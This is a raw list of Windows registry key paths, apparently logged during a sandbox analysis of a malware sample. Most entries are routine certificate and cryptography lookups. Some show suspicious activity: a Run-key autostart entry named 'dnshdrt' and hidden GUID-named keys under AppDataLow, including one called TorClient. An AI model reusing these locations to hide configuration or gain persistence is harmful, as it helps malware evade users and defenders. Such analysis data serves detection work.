HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\Root
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\245C97DF7514E7CF2DF8BE72AE957B9E04741E85
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\245C97DF7514E7CF2DF8BE72AE957B9E04741E85\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\7F88CD7223F3C813818C994614A89C99FA3B5247
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\7F88CD7223F3C813818C994614A89C99FA3B5247\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\A43489159A520F0D93D032CCAF37E7FE20A8B419
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\A43489159A520F0D93D032CCAF37E7FE20A8B419\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\BE36A4562FB2EE05DBB3D32323ADF445084ED656
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\BE36A4562FB2EE05DBB3D32323ADF445084ED656\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CDD4EEAE6000AC7F40C3802C171E30148030C072
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CDD4EEAE6000AC7F40C3802C171E30148030C072\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\AuthRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\742C3192E607E424EB4549542BE1BBC53E6174E2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\742C3192E607E424EB4549542BE1BBC53E6174E2\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\85371CA6E550143DCE2803471BDE3A09E8F8770F
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\85371CA6E550143DCE2803471BDE3A09E8F8770F\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\97817950D81C9670CC34D809CF794431367EF474
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\97817950D81C9670CC34D809CF794431367EF474\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D23209AD23D314232174E40D7F9D62139786633A
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D23209AD23D314232174E40D7F9D62139786633A\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DE28F4A4FFE5B92FA3C503D1A349A7F9962A8212
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DE28F4A4FFE5B92FA3C503D1A349A7F9962A8212\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\CTLs
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\Root
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\Root\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\Root
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\SmartCardRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\SmartCardRoot
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\SmartCardRoot\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\TrustedPeople\PhysicalStores
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\TrustedPeople
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\TrustedPeople\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\TrustedPeople
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\TrustedPeople\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\TrustedPeople
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\TrustedPeople
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\TrustedPeople\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\TrustedPeople
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\trust\PhysicalStores
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\trust
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\trust\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\trust\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\trust\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\trust\CTLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\trust
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\trust\Certificates
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\trust\CRLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\trust\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\trust\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\trust
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\trust\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\trust
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\trust\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\trust
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Diagnostics
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserenvDebugLevel
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\GpSvcDebugLevel
HKEY_LOCAL_MACHINE\System\Setup
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\UrlDllGetObjectUrl
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\UrlDllGetObjectUrl
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\AuthRoot
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\LogLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\LogMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\LogMaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllImportPublicKeyInfoEx
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllImportPublicKeyInfoEx
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllConvertPublicKeyInfo
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllConvertPublicKeyInfo
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllVerifyCertificateChainPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CertDllVerifyCertificateChainPolicy
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\Escalation
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\WMR
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledProcesses\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\79B55E88
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledSessions\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\WinHttpSettings
HKEY_LOCAL_MACHINE\Software\Microsoft\Ole
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\MaximumAllowedAllocationSize
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Class\{4d36e972-e325-11ce-bfc1-08002be10318}
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\Wpad
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-0c-29-dc-04-c0
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\EnableInetUnknownAuth
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllVerifyEncodedSignature
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllVerifyEncodedSignature
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllImportPublicKeyInfoEx2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllImportPublicKeyInfoEx2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllEncodeObjectEx
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.1.1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.11
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.12
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.4
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Scr
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\{8E20961D-952E-F0AE-8FA2-992433F6DD98}
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Keys
\xe4\xa4\x90\xe2\xbc\x80
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\TorClient
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableSPDY3_0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\KnownClasses
HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\InfoTip
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DebugHeapFlags
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LDAP\LdapClientIntegrity
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LDAP\UseOldHostResolutionOrder
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LDAP\UseHostnameAsAlias
DisableUserModeCallbackFilter
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dnshdrt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Client
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000809
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Ini
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Temp
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL\UserContextLockCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL\UserContextListCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.44.3.4!7\Name
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\MUI\StringCacheSettings\StringCacheGeneration
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\system32\p2pcollab.dll,-8042
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.47.1.1!7\Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\system32\qagentrt.dll,-10
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.64.1.1!7\Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.67.1.1!7\Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.67.1.2!7\Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\System32\fveui.dll,-844
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DiagLevel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DiagMatchAnyMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\DisableMandatoryBasicConstraints
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\DisableCANameConstraints
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\DisableUnsupportedCriticalExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlCountInCert
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlRetrievalCountPerChain
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxUrlRetrievalByteCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlRetrievalByteCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlRetrievalCertCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\CryptnetPreFetchTriggerPeriodSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\EnableWeakSignatureFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\ChainCacheResyncFiletime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001\ProfileImagePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\109F1CAED645BB78B3EA2B94C0697C740733031C\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\D559A586669B08F46A30A133F8A9ED3D038E2EA8\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\FEE449EE0E3965A5246F000E87FDE2A065FD89D4\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs\A377D1B1C0538833035211F4083D00FECC414DAB\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\637162CC59A3A1E25956FA5FA8F60D2E1C52EAC6\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\7D7F4414CCEF168ADF6BF40753B5BECD78375931\Blob
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\ProtectedRoots\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\245C97DF7514E7CF2DF8BE72AE957B9E04741E85\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\7F88CD7223F3C813818C994614A89C99FA3B5247\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\A43489159A520F0D93D032CCAF37E7FE20A8B419\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\BE36A4562FB2EE05DBB3D32323ADF445084ED656\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CDD4EEAE6000AC7F40C3802C171E30148030C072\Blob
